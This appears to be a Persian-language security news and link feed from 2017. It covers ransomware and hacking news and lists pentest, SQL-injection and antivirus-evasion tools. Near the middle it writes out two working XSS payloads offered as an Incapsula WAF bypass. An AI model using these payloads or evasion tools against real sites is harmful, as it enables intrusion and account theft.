ال جی کره مجددا مورد حمله سایبری قرار گرفت.
سرویس اینترنت و امنیت کره جنوبی گزارشی از شرکت ال جی مبنی بر حمله بدافزاری که شبیه به WannaCry بوده دریافت کرده.اما این موضوع کاملا تایید نشده است.
بعد از ایجاد تاخیر در برخی از سرویس های آنلاین این شرکت، کارشناسان این شرکت با کشف کدهای مخرب اقدام به خاموش کردن تعدادی از دستگاه های آلوده کردند.
هوشیاری کارشناسان باعث شده باج افزار موفق یه رمزنگاری داده ها نشه و جلوی حمله و ضرر رو به سرعت گرفتن.

#news
#lg
#wannacry
#ransomware

توضیحاتی در مورد اقسام شبکه های عصبی

https://becominghuman.ai/cheat-sheets-for-ai-neural-networks-machine-learning-deep-learning-big-data-678c51b4b463

#AI
#machine_learning

ابزار portia برای تست نفوذ شبکه های داخلی و بالا بردن سطح دسترسی بعد از تسخیر کاربری با سطح دسترسی پایین

https://github.com/SpiderLabs/portia

#pentest
#network
#privilege_escalate

هک و هایجک موسهای وایرلس

https://toshellandback.com/2017/08/16/mousejack/

#mosuejack
#wireless

کریم باراتف هکر روس که متهم شده به هک کردن سیستم های یاهو و سرقت اطلاعات ۵۰۰ میلیون کاربر ، در کانادا دستگیر و به امریکا تحویل داده شد.
در اولین اخبار منتشر شده کریم این هک رو تکذیب کرده.

پیلود های SQLI برای استفاده در Burp Suite و OWASP Zed Attack Proxy

هکر ناشناسی با هک کردن Enigma موفق به سرقت Ethereum به ارزش 471 هزار دلار شد.

https://securityaffairs.co/wordpress/62219/hacking/enigma-platform-hacked.html

#cryptocurrency
#btc
#ethereum

NoSQLMap – Automated NoSQL Exploitation Tool

https://www.darknet.org.uk/2017/08/nosqlmap-automated-nosql-exploitation-tool/

#nosql
#injection
#pentest
#web
#database

Out of Band
XML External Entity Injection via SAML SSO

اوراکل قصد داره سورس J2E رو باز کنه!

https://www.techworm.net/2017/08/oracle-open-source-java-enterprise-edition-java-ee.html

Incapsula WAF XSS bypass
1) <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>

آموزش محدود کردن دسترسی کاربران در لینوکس

https://linuxconfig.org/how-to-restrict-users-access-on-a-linux-machine

#linux

ماشین حساب ویندوز از اینترنت استفاده میکند!
این دسترسی ظاهرا برای به روزرسانی نرخ ارز هست.

https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator

#windows
#malware

ابزار اسکن ساب دامین


https://github.com/guelfoweb/knock

#pentest
#eunum
#web

کشف و اکسپلویت کردن باگ SQL Injection

https://gbhackers.com/sqlmap-detecting-exploiting-sql-injection/

#sqli
#web
#pentest

نکاتی برای کشف باگ SQLi

https://gerbenjavado.com/manual-sql-injection-discovery-tips/

#web
#sqli
#pentest

AngryFuzz3r

https://github.com/ihebski/angryFuzzer

#web
#pentest
#fuzz

اثبات اکسپلویت CVE-2017-8625

https://posts.specterops.io/umci-vs-internet-explorer-exploring-cve-2017-8625-3946536c6442

#windows
#exploit
#js
#ps

AVPASS

AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logics by using the leaked information coupled with APK obfuscation techniques.

https://github.com/sslab-gatech/avpass

#android
#smartsecurity
#malware
#trojan

SQLiv
Massive SQL injection scanner

https://github.com/Hadesy2k/sqliv

#web
#pentest
#sqli
#scanner
#tool